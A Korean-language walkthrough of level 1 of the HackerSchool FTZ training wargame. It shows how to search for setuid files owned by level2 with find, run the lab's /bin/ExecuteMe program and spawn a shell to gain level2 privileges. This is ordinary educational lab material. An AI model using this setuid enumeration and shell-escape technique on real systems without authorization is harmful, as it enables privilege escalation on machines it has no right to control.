HackerSchool FTZ(FreeTraing Zone) level1

#FTZ 접속은 해커스쿨 홈페이지로 하시던, VMWare로 하시던 접속 할 줄 안다는 전제 하에 진행합니다.

ID : level1

PW : level1

[level1@ftz level1]$ ls

hint  public_html  tmp

접속 후 ls 명령어를 실행하면 하나의 파일과 두개의 디렉터리가 존재한다.

cat 명령어로 hint의 내용을 열어보자.

[level1@ftz level1]$ cat hint

level2 권한에 setuid가 걸린 파일을 찾는다.

[level1@ftz level1]$

level2 권한을 가진 파일을 찾으란다.

find 명령어를 쓰면 된다. 

find 명령어에 대한 설명은 이곳에 있다 (설명을 아주 잘 해주셨다.)

[level1@ftz level1]$ find / -perm +4000 -user level2 2>/dev/null

/bin/ExecuteMe

[level1@ftz level1]$

찾았더니 실행파일이 하나 나오는데, 실행하란다. 하자.

[level1@ftz level1]$ /bin/ExecuteMe

레벨2의 권한으로 당신이 원하는 명령어를

                한가지 실행시켜 드리겠습니다.

                (단, my-pass 와 chmod는 제외)

                어떤 명령을 실행시키겠습니까?

                [level2@ftz level2]$

위와 같은 창이 뜬다.

my-pass 는 패스워드를 알려주는 명령어이고 chmod는 권한을 지정해주는 명령어이니 우리는 해커답게 shell을 실행시켜보자

shell을 실행시키는 명령어인 sh를 실행하면 아래와 같이 Prompt가 바뀐다.

sh-2.05b$

여기서 내가 정상적으로 level2가 됬는지 확인하고자 하면

sh-2.05b$ id

uid=3002(level2) gid=3001(level1) groups=3001(level1)

sh-2.05b$ whoami

level2

sh-2.05b$

정상적으로 level2가 된 것을 확인 할 수 있다.

my-pass를 입력하여 다음 레벨로 넘어가자.